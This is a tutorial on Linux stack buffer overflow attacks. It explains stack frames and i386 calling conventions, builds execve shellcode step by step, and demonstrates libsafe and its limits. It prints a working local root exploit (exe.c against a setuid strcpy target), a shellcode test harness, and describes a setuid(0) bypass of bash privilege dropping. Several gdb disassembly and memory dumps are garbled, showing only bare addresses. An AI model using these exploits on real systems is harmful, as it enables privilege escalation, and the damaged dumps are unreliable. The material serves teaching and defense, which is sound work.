Foreword
Logically, the stack of a process is made up of stack frames, each of which corresponds to one function call. When a function is called, a new stack frame is pushed onto the stack; when the function returns, its stack frame is popped off the stack. Although the stack frame gives direct hardware support for implementing functions and procedures in high-level languages, it also stores critical data such as the function's return address in memory that the program itself can see and modify, and this poses a serious hidden danger to system security.
The most famous buffer overflow attack in history is probably the one carried by the Morris Worm on November 2, 1988. This Internet worm exploited a buffer overflow vulnerability in the fingerd program and did great harm to users. Since then, more and more buffer overflow vulnerabilities have been discovered. From bind, wu-ftpd, telnetd, and apache to the applications shipped by software vendors such as Microsoft and Oracle, there always seems to be another buffer overflow vulnerability to patch.
According to the vulnerability reports published by the Green Alliance, 1830 vulnerabilities were found in operating systems and applications in 2002, of which 432 were buffer overflow vulnerabilities, accounting for 23.6% of the total. Of the ten security vulnerabilities that the Green Alliance rated as having the greatest impact in 2002, 6 were buffer overflows.
One thing needs explaining before you read on: all sample programs in this article were compiled and run with GCC 2.7.2.3 and bash 1.14.7. If you do not know which versions you are using, you can check with the following commands:
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.7.2.3/specs
gcc version 2.7.2.3
$ rpm -qf /bin/sh
bash-1.14.7-16
If you use a newer version of GCC or bash, the results of running the sample programs may not match the results given here; the specific reasons are explained in the relevant sections.
A Linux buffer overflow attack example
To arouse your interest, let's start with an example of a buffer overflow attack under Linux.
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
extern char **environ;
int main(int argc, char **argv)
{
    char large_string[128];
    long *long_ptr = (long *) large_string;
    int i;
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    /* fill the whole string with the address given in argv[2] */
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) strtoul(argv[2], NULL, 16);
    /* place the shellcode at the start of the string */
    for (i = 0; i < (int) strlen(shellcode); i++)
        large_string[i] = shellcode[i];
    /* hand the string to the target program through the environment */
    setenv("Kirika", large_string, 1);
    execle(argv[1], argv[1], NULL, environ);
    return 0;
}
Figure 1 Attack program exe.c
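#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv)
{
    char buffer[96];
    printf("- %p -\n", &buffer);
    /* unbounded copy of an environment variable: this is the vulnerability */
    strcpy(buffer, getenv("Kirika"));
    return 0;
}
Figure 2 Attack target toto.c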
Compile both programs into executables, and make toto a setuid program owned by root:
$ gcc exe.c -o exe
$ gcc toto.c -o toto
$ su
Password:
# chown root.root toto
# chmod +s toto
# ls -l exe toto
-rwxr-xr-x 1 wy os 11871 Sep 28 20:20 exe*
-rwsr-sr-x 1 root root 11269 Sep 28 20:20 toto*
# exit
OK, let's see what happens next. First, don't forget to verify our current identity with the whoami command. Linux inherits a UNIX convention here: an ordinary user's command prompt starts with $, and the superuser's command prompt starts with #.
$ whoami
wy
$ ./exe ./toto 0xbfffffff
- 0xbffffc38 -
Segmentation fault
$ ./exe ./toto 0xbffffc38
- 0xbffffc38 -
bash# whoami
root
bash#
The first attempt usually fails, but it tells us exactly the address we need, 0xbffffc38, and the second attempt hits the mark. When we run whoami again in the newly created shell, our identity is already root! Since the ultimate goal of an attack on any UNIX system is to obtain root privileges, the system can be considered compromised.
Here we have simulated a typical Linux buffer overflow attack. toto is owned by root and has the setuid attribute, which makes it a typical target for a buffer overflow attack. The ordinary user wy used the attack program exe, which carries malicious code, to launch a buffer overflow attack on toto and obtained root privileges on the system. One caveat: if you use a newer version of bash, then even if the attack program exe gives you a new shell through the overflow, the whoami command may show that your privileges have not changed. The last section of this article explains why in detail. To see the effect right away, you can use exe_pro.c from the package accompanying this article as the attack program instead of exe.c in Figure 1.
Process address space layout and stack frame structure under Linux
To understand the principle of buffer overflow attacks under Linux, we must first understand the layout of a process's address space under Linux and the structure of the stack frame.
Every program consists of a code segment and a data segment, both of which are static. To run a program, the operating system first creates a process for it and maps its code segment and data segment into the virtual address space of the process. The code and data segments alone are not enough: a process also needs a dynamic environment while it runs, and the most important part of that environment is the stack. Figure 3 shows the address space layout of a process under Linux:
Figure 3 Layout of Process Address Space Under Linux
First, execve(2) sets up the mappings for the code segment and data segment of the process; actually reading the contents of those segments into memory is done by the system's page fault handler. execve(2) also zeroes the BSS segment, which is why uninitialized global variables and static variables start out as zero. The highest part of the process's user space holds the command-line arguments and environment variables at run time. Between this region and the code and data segments lies a large hole, which gives the stack and the heap room to grow: the stack grows downward and the heap grows upward.
Now that we know where the stack sits in the process address space, let's look at what is stored in it. You are no doubt familiar with functions in C. What the stack stores is the stack frame of each function call. When a function is called, a new stack frame is pushed onto the stack; when the function returns, its stack frame is popped off the stack. A typical stack frame structure is shown in Figure 4.
At the top of the stack frame are the function's arguments; below them are the function's return address and a pointer to the previous stack frame; at the bottom is the space allocated for the function's local variables. A stack frame usually has two pointers, one called the stack frame pointer and the other the stack pointer. The position the former points to is fixed, while the position the latter points to changes while the function runs. Arguments and local variables are therefore accessed using the stack frame pointer as the base address plus an offset. As Figure 4 shows, the offsets of arguments are positive and the offsets of local variables are negative.
Figure 4 Typical stack frame structure
Having introduced the structure of the stack frame, let's see how it is implemented on the Intel i386 architecture. Figures 5 and 6 show a simple C program and the assembly the compiler generates for it.
int function(int a, int b, int c)
{
    char buffer[14];
    int sum;
    sum = a + b + c;
    return sum;
}
void main()
{
    int i;
    i = function(1, 2, 3);
}
Figure 5 A simple C program example1.c
1 .file "example1.c"
2 .version "01.01"
3 gcc2_compiled.:
4 .text
5 .align 4
6 .globl function
7 .type function,@function
8 function:
9 pushl %ebp
10 movl %esp,%ebp
11 subl $20,%esp
12 movl 8(%ebp),%eax
13 addl 12(%ebp),%eax
14 movl 16(%ebp),%edx
15 addl %eax,%edx
16 movl %edx,-20(%ebp)
17 movl -20(%ebp),%eax
18 jmp .L1
19 .align 4
20 .L1:
21 leave
22 ret
23 .Lfe1:
24 .size function,.Lfe1-function
25 .align 4
26 .globl main
27 .type main,@function
28 main:
29 pushl %ebp
30 movl %esp,%ebp
31 subl $4,%esp
32 pushl $3
33 pushl $2
34 pushl $1
35 call function
36 addl $12,%esp
37 movl %eax,%eax
38 movl %eax,-4(%ebp)
39 .L2:
40 leave
41 ret
42 .Lfe2:
43 .size main,.Lfe2-main
44 .ident "GCC: (GNU) 2.7.2.3"
Figure 6 Assembly program example1.s generated by compiling example1.c
Here we focus on how the stack frame of function is created and destroyed. As Figure 5 shows, function is called from main with the three arguments 1, 2, and 3. Because C passes arguments in reverse order, lines 32 to 34 of Figure 6 push the three arguments onto the stack from right to left. Next, the call instruction in line 35, besides transferring control to function, pushes onto the stack the address of the instruction that follows the call, the addl in line 36. Inside function, line 9 saves main's stack frame pointer EBP on the stack, line 10 copies the current stack pointer ESP into the stack frame pointer EBP, and line 11 allocates stack space for function's local variables buffer[14] and sum. At this point the stack frame of function is complete; its structure is shown in Figure 7.
Figure 7 Stack frame of function
You may want to go back and compare this with Figure 4. A few points need explaining. First, on the Intel i386 architecture the role of the stack frame pointer is played by EBP and the role of the stack pointer by ESP. Second, function's local variable buffer[14] consists of 14 characters and should be 14 bytes in size, yet 16 bytes are allocated for it in the stack frame. This is a trade-off between time efficiency and space efficiency: the Intel i386 is a 32-bit processor, every memory access must be 4-byte aligned, and the 4 bytes whose addresses share the same upper 30 bits form one machine word. If sum were placed so that it filled the two bytes left over by buffer[14], it would straddle two machine words, and every access to sum would take two memory operations, which is clearly unacceptable.
Also, as pointed out at the beginning of this article, if you use a newer version of GCC, the stack frame of function that you see may differ from Figure 7. As described above, the space for function's local variables buffer[14] and sum is allocated by the subtraction on ESP in line 11 of Figure 6, and the 20 in the sub instruction is the storage required for the local variables. With a newer version of GCC, the number in the sub instruction may not be 20 but something larger. This is related to optimizing compilation: to make effective use of current optimization techniques, newer versions of GCC usually reserve some extra space in the stack frame of every function.
Now let's see how function computes the sum of a, b, and c and assigns it to sum. As mentioned earlier, arguments and local variables are accessed inside a function using the stack frame pointer as the base address plus an offset, and on the Intel i386 architecture the stack frame pointer is EBP. For clarity, Figure 7 labels the offset of every component of the stack frame relative to EBP. The computation in lines 12 to 16 of Figure 6 is then clear at a glance: 8(%ebp), 12(%ebp), 16(%ebp), and -20(%ebp) are the addresses of the arguments a, b, c and the local variable sum, and a few simple add and mov instructions leave the sum of a, b, and c in sum. In assembly generated by GCC, a function's return value is passed in EAX, so line 17 copies the value of sum into EAX.
Finally, let's see how function finishes and how its stack frame is popped. The leave instruction in line 21 of Figure 6 copies the stack frame pointer EBP into ESP, which releases the space allocated for the local variables buffer[14] and sum; leave also pops a machine word off the stack into EBP, which restores EBP to main's stack frame pointer. The ret instruction in line 22 pops another machine word off the stack into the instruction pointer EIP, so control returns to the addl instruction in line 36 of main. The addl instruction adds 12 to the stack pointer ESP, releasing the stack space occupied by the three arguments pushed before the call. At this point the stack frame of function is completely destroyed.
As just mentioned, assembly generated by GCC passes a function's return value in EAX, so line 38 stores the return value of function into main's local variable i.
Principle of buffer overflow attacks under Linux
Now that we understand the layout of a Linux process and the structure of the stack frame, let's look at an interesting example.
1 int function(int a, int b, int c) {
2 char buffer[14];
3 int sum;
4 int *ret;
5
6 ret = buffer + 20;
7 (*ret) += 10;
8 sum = a + b + c;
9 return sum;
10 }
11
12 void main() {
13 int x;
14
15 x = 0;
16 function(1, 2, 3);
17 x = 1;
18 printf("%d\n", x);
19 }
Figure 8 A curious program example2.c
In main, the local variable x is first set to 0, then a function that has nothing to do with x is called, and finally x is changed to 1 and printed. What is the result? If I told you it was 0, would you believe it? Enough talk; let's see what function is up to. This function differs from the one in Figure 5 only by an extra pointer variable ret and the two statements that operate on it, and it is these that make main print 0. As Figure 7 shows, the address buffer + 20 holds the return address of function, and the statement in line 7 adds 10 to that return address. What does this achieve? Let's look at the assembly of main.
$ gdb example2
(gdb) disassemble main
Dump of assembler code for function main:
0x804832c
0x804832D
0x804832f
0x8048332
0x8048339
0x804833B
0x804833d
0x804833f
0x8048344
0x8048347
0x804834e
0x8048351
0x8048352
0x8048357
0x804835C
0x804835f
0x8048360
0x8048361
End of assembler dump.
Figure 9 Assembly corresponding to the main function in example2.c
The call instruction at address 0x804833f pushes 0x8048344 onto the stack as the return address of function, and the statement in line 7 of Figure 8 adds 10 to it, turning 0x8048344 into 0x804834e. As a result, when function returns, the mov instruction at address 0x8048347 is skipped, and that mov instruction is exactly the one that changes the value of x to 1. Since the value of x is never changed, the result we print is inevitably 0.
Of course, Figure 8 is only a demonstration in which we change the normal control flow of a program by modifying the return address saved in the stack frame. Its result may strike many readers as a novelty, but what if the return address were modified to point to carefully crafted malicious code? A buffer overflow attack exploits exactly this fact: on certain architectures the return address of a function is stored on the stack where the program can reach it, so by overwriting that return address an attacker makes the function return into carefully crafted malicious code and thereby compromises the security of the system.
No discussion of buffer overflows is complete without shellcode. You have already seen shellcode in Figure 1; its job is to spawn a shell. Let's see step by step how this bewildering string of bytes comes about. First, system calls under Linux are made through int $0x80. Before int $0x80 is executed, the system call number is stored in EAX and the arguments of the system call are stored in other registers. Figure 10 shows a Hello World program implemented directly with system calls.
#include <asm/unistd.h>
int errno;
_syscall3(int, write, int, fd, char *, data, int, len);
_syscall1(int, exit, int, status);
_start()
{
    write(0, "Hello World!\n", 13);
    exit(0);
}
Figure 10 Hello World program hello.c that uses system calls directly
Compile and link it into the executable hello:
$ gcc -c hello.c
$ ld hello.o -o hello
$ ./hello
Hello World!
$ ls -l hello
-rwxr-xr-x 1 wy os 1188 Sep 29 17:31 hello*
Interested readers can compare the size of this hello with that of the Hello World program from their first C class and see whether they can write an even smaller Hello World in C. The _syscall3 and _syscall1 used in Figure 10 are macros defined in /usr/include/asm/unistd.h. That file defines the system call numbers, whose names begin with __NR_, and the macros _syscall0 through _syscall6, which are used for system calls that take 0 to 6 arguments. From this we can tell that a Linux system call takes at most 6 arguments, as mmap(2) does. Reading the definitions of _syscall0 through _syscall6 also shows that the system call number is stored in register EAX and that the up to six arguments of the system call are stored in registers EBX, ECX, EDX, ESI, EDI, and EBP.
With the rules for system calls clear, let's see how to spawn a shell under Linux. This is a very simple task using the execve(2) system call, as shown in Figure 11.
#include <unistd.h>
int main()
{
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    _exit(0);
}
Figure 11 shellcode.c, which spawns a shell under Linux
shellcode.c uses two system calls, execve(2) and _exit(2). Looking in /usr/include/asm/unistd.h, we find that the corresponding system call numbers __NR_execve and __NR_exit are 11 and 1. Following the system call rules above, spawning a shell under Linux and then exiting takes the following steps:
1. Store the string "/bin/sh", terminated by '\0', in memory.
2. Store the address of the string "/bin/sh" in a machine word in memory, immediately followed by a machine word with the value 0; this corresponds to setting the two pointers of name[2] in Figure 11.
3. Load the system call number of execve(2), 11, into the EAX register.
4. Load the address of the string "/bin/sh" into the EBX register.
5. Load the address of the machine word set up in step 2 that holds the address of "/bin/sh" into the ECX register.
6. Load the address of the machine word set up in step 2 that holds the value 0 into the EDX register.
7. Execute int $0x80, which is equivalent to calling execve(2).
8. Load the system call number of _exit(2), 1, into the EAX register.
9. Load the exit code 0 into the EBX register.
10. Execute int $0x80, which is equivalent to calling _exit(2).
This gives the assembly program shown in Figure 12.
1 void main()
2 {
3 __asm__("
4 jmp 1f
5 2: popl %esi
6 movl %esi,0x8(%esi)
7 movb $0x0,0x7(%esi)
8 movl $0x0,0xc(%esi)
9 movl $0xb,%eax
10 movl %esi,%ebx
11 leal 0x8(%esi),%ecx
12 leal 0xc(%esi),%edx
13 int $0x80
14 movl $0x1,%eax
15 movl $0x0,%ebx
16 int $0x80
17 1: call 2b
18 .string \"/bin/sh\"
19 ");
20 }
Figure 12 Assembly program shellcodeasm.c that spawns a shell with the execve(2) and _exit(2) system calls
The jmp instruction in line 4 and the call instruction in line 17 both use IP-relative addressing. Lines 14 to 16 correspond to the _exit(2) system call; since it is relatively simple, we concentrate on the call to execve(2). First, the jmp instruction in line 4 transfers control to the call instruction in line 17. While transferring control to the popl instruction in line 5, the call instruction pushes onto the stack the address of the instruction that follows it. As Figure 12 shows, what follows the call is not an instruction but the string "/bin/sh", so what is actually pushed is the address of that string. The popl instruction in line 5 then pops the string's address into the ESI register. The next three instructions store the string address held in ESI into the machine word right after the string "/bin/sh", write a '\0' at the end of the string, and write 0 into the appropriate place in memory. Lines 9 to 12 set the registers EAX, EBX, ECX, and EDX to the proper values, and line 13 calls execve(2). But after compiling shellcodeasm.c you will find that the program does not run. The reason is that all the data shown in Figure 13 is stored in the code segment, and under Linux the pages of the code segment are not writable. When the mov instructions in Figure 12 try to write to them, the page fault handler sends a SIGSEGV signal to the process running our program, and the message Segmentation fault appears on the terminal.
Figure 13 Register settings when calling execve(2)
The solution is simple. Since we cannot write to the code segment, we move the code of Figure 12 into the writable data segment or stack segment. But how can executable code be placed in the data segment? Everything in memory is stored as bits of 0 and 1: when a program uses those bits as code they are code, and when it uses them as data they are data. Let's first see how the code of Figure 12 is stored in memory. This is easy to do with the x command in gdb, as shown in Figure 14.
$ gdb shellcodeasm
(gdb) disassemble main
Dump of assembler code for function main:
0x80482c4
0x80482c5
0x80482c7
0x80482c9
0x80482ca
0x80482cd
0x80482d1
0x80482d8
0x80482DD
0x80482df
0x80482e2
0x80482e5
0x80482e7
0x80482ec
0x80482f1
0x80482f3
0x80482f8
0x80482f9
0x80482FC
0x80482fd
0x80482ff
0x8048301
0x8048302
End of assembler dump.
(gdb) x/49xb 0x80482c7
0x80482c7
0x80482cf
0x80482df
0x80482e7
0x80482ef
0x80482f7
Figure 14 Viewing the bytes of the code in memory with the x command in gdb
From the start address of the jmp instruction, 0x80482c7, to the end address of the call instruction, 0x80482f8, there are 49 bytes in total. The 8 bytes starting at 0x80482f8 actually hold the string "/bin/sh", which is why the disassembly shows several strange instructions there. Our shellcode is now taking shape, but several things need improving. First, we are going to copy this code into a memory buffer with strcpy(3), and strcpy(3) stops copying when it meets a '\0'. Figure 14 shows that our code contains many such '\0' bytes, so they must be removed. In addition, some instructions can be shortened to make the shellcode more compact. Applying the improvements listed in Figure 15 gives the final shellcode in Figure 16.
Problematic instructions        Replacement instructions
movb $0x0,0x7(%esi)             xorl %eax,%eax
movl $0x0,0xc(%esi)             movb %eax,0x7(%esi)
                                movl %eax,0xc(%esi)
movl $0xb,%eax                  movb $0xb,%al
movl $0x1,%eax                  xorl %ebx,%ebx
movl $0x0,%ebx                  movl %ebx,%eax
                                inc %eax
Figure 15 Improvements to the shellcode
void main()
{
__asm__("
    jmp 1f
2:  popl %esi
    movl %esi,0x8(%esi)
    xorl %eax,%eax
    movb %eax,0x7(%esi)
    movl %eax,0xc(%esi)
    movb $0xb,%al
    movl %esi,%ebx
    leal 0x8(%esi),%ecx
    leal 0xc(%esi),%edx
    int $0x80
    xorl %ebx,%ebx
    movl %ebx,%eax
    inc %eax
    int $0x80
1:  call 2b
    .string \"/bin/sh\"
");
}
Figure 16 Final shellcode assembly program shellcodeasm2.c
In the same way, we view the bytes of the shellcode in memory again, as shown in Figure 17. Figure 17 also lists the shellcode used in Figure 1; interested readers may wish to compare the two.
$ gdb shellcodeasm2
(gdb) disassemble main
Dump of assembler code for function main:
0x80482c4
0x80482c5
0x80482c7
0x80482c9
0x80482ca
0x80482cd
0x80482cf
0x80482d2
0x80482d5
0x80482d7
0x80482d9
0x80482dc
0x80482df
0x80482e1
0x80482e3
0x80482e5
0x80482e6
0x80482e8
0x80482ed
0x80482ee
0x80482f1
0x80482f2
0x80482f4
0x80482f6
0x80482f7
End of assembler dump.
(gdb) x/38xb 0x80482c7
0x80482c7
0x80482cf
0x80482d7
0x80482DF
0x80482e7
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
Figure 17 Origin of the shellcode
I guess that by now you are as eager as I am to give it a try. Then let's try it.
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main()
{
    int *ret;
    /* two words above ret lies main's saved return address */
    ret = (int *) &ret + 2;
    (*ret) = (int) shellcode;
}
Figure 18 Verifying our shellcode with the program testsc.c
Compile testsc.c into an executable and run testsc, and you will see a shell again!
$ gcc testsc.c -o testsc
$ ./testsc
bash$
Figure 19 depicts everything the testsc.c program does. After the long groundwork above, you should have no difficulty understanding Figure 19.
Figure 19 What the program testsc.c does
Now let's go back to the Linux buffer overflow attack example at the beginning of this article. The attack program exe.c exploits the vulnerable program toto.c on the system and launches a buffer overflow attack through the following steps:
1. Obtain the address of the buffer buffer[96] in toto.c from the command-line argument argv[2], and fill large_string[128] with that address.
2. Copy our shellcode to the beginning of large_string[128].
3. Inject large_string[128] into buffer[96] through the environment variable Kirika.
4. When the main function of toto.c returns, the shellcode in buffer[96] starts running.
5. Because toto is owned by root and has the setuid attribute, the shell we get has root privileges.
The control flow of exe.c is very similar to that of testsc.c shown in Figure 19. The only difference is that this time our shellcode resides on the stack of toto at run time rather than in the data segment. The shellcode cannot be placed in the data segment because when exe.c runs toto through exec(3), the whole address space is remapped according to the program header of toto, and the contents of the data segment in the original address space are no longer accessible. That is why exe.c passes the shellcode through an environment variable.
So, do the legendary hackers no longer seem as mysterious as you imagined? Don't jump to conclusions. In the attack example above, the attack program exe could place the shellcode in toto's buffer[96] so precisely only because toto prints the starting address of buffer[96] on the stack. In a real system, don't expect to find a program as careless as toto.
Defending against buffer overflow attacks under Linux
Once the principle of buffer overflow attacks is understood, the next step is naturally to find ways to defend against them. Here we introduce a very simple but popular approach: libsafe.
The standard C library contains many functions like strcpy(3), which copies one string to another. To decide when to stop copying, these functions usually have only one criterion: whether a '\0' character has been encountered. This single criterion is clearly not enough. The attack example analysed in the previous section used strcpy(3) to attack the system, and the flaw of strcpy(3) is that it does not take the size of the destination into account when copying a string. There are many functions like this, such as strcat, gets, scanf, and sprintf. Statistics show that these functions are the culprits in most buffer overflow attacks. It was on this basis that Avaya Labs introduced libsafe.
In current Linux systems most programs are linked against dynamic link libraries. Dynamic link libraries have many advantages. For example, after a library is upgraded, the existing programs in the system need neither recompiling nor relinking and simply continue to run with the upgraded library. Linux also provides several flexible mechanisms for using dynamic link libraries, and preloading is one of them. Under Linux, preloading is controlled by the environment variable LD_PRELOAD. Put simply, if several dynamic link libraries in the system implement the same function, the one in the library named by LD_PRELOAD takes precedence at link time. We can therefore use the preload mechanism to replace the unsafe functions mentioned above, and libsafe is built on exactly this idea.
testlibsafe.c, shown in Figure 20, is a very simple program: it fills the string buf2[16] with 'A' and then copies it into buf1[8] with strcpy(3). Since buf2[16] is larger than buf1[8], a buffer overflow obviously occurs, and since the byte value of 'A' is 0x41, the return address of main is changed to 0x41414141. A segmentation fault therefore occurs when main returns.
#include <string.h>
void main()
{
    char buf1[8];
    char buf2[16];
    int i;
    for (i = 0; i < 16; ++i)
        buf2[i] = 'A';
    strcpy(buf1, buf2);
}
Figure 20 Test program testlibsafe.c for libsafe
$ gcc testlibsafe.c -o testlibsafe
$ ./testlibsafe
Segmentation fault (core dumped)
Now let's see how libsafe protects us from buffer overflow attacks. First install libsafe on the system; the version 2.0 installation package is provided in the attachment to this article.
$ su
Password:
# rpm -ivh libsafe-2.0-2.i386.rpm
libsafe ##################################################
# exit
Installation alone is not enough; the environment variable LD_PRELOAD must also be set correctly.
$ export LD_PRELOAD=/lib/libsafe.so.2
Now let's try again.
$ ./testlibsafe
Detected an attempt to write across stack boundary.
Terminating /home2/wy/projects/overflow/bof/testlibsafe.
uid=1011 euid=1011 pid=9481
Call stack:
0x40017721
0x4001780a
0x8048328
0x400429c6
Overflow caused by strcpy()
As you can see, libsafe correctly detected the buffer overflow caused by the strcpy() function, and the UID, EUID, and PID of the process and its call stack at run time are listed as well. This information is not only shown on the terminal but also recorded in the system log, so the system administrator can identify potential attack sources and stop them in time.
So, can we now rest easy? Don't be so naive: in computer security the contest between intrusion and defense never stops. In fact, the protection libsafe gives us is easily defeated. Because libsafe relies on the preload mechanism that Linux provides for dynamic link libraries, it is powerless for statically linked programs that contain buffer overflow vulnerabilities.
$ gcc -static testlibsafe.c -o testlibsafe_static
$ env | grep LD
LD_PRELOAD=/lib/libsafe.so.2
$ ./testlibsafe_static
Segmentation fault (core dumped)
With the -static option, gcc links against static libraries. Even with libsafe installed on the system, testlibsafe_static again produces a segmentation fault.
In addition, as pointed out earlier in this article, if you use a newer version of bash, you may find that the new shell you get after running the attack program exe does not have the root privileges you expected. This is one of the improvements in newer versions of bash. Buffer overflow attacks have been common over the past decade, and most of them target setuid programs owned by root in order to gain root privileges, so running setuid root programs on a system is very dangerous. For this reason, the newer POSIX.1 standard added a system call named seteuid(2), which changes the effective UID of a process. Newer versions of bash use this technique: when bash starts, it sets the effective UID of the process to its real UID, which produces the result seen when the attack program exe is run under a newer bash. So are newer versions of bash invulnerable? Not really. As long as setuid(0) is called before the shell is created with execve(2), so that the real UID of the process is also changed to 0, this improvement in bash is defeated. In other words, all that is needed is to add the setuid(0) system call to the shellcode following the system call rules described earlier, and this takes little extra work. shellcodeasm3.c and exe_pro.c in the attachment show how.
Conclusion
Security comes in two forms. In one, your system has vulnerabilities, but hackers do not know about them, so you can temporarily consider your system safe. In the other, both you and the hackers have discovered the vulnerabilities in your system, but you do your best to fix them so that your system is truly secure. Which do you want? A sentence from the Bible answers this question, and it is also engraved on a wall of the US Central Intelligence Agency: "You shall know the truth, and the truth shall make you free."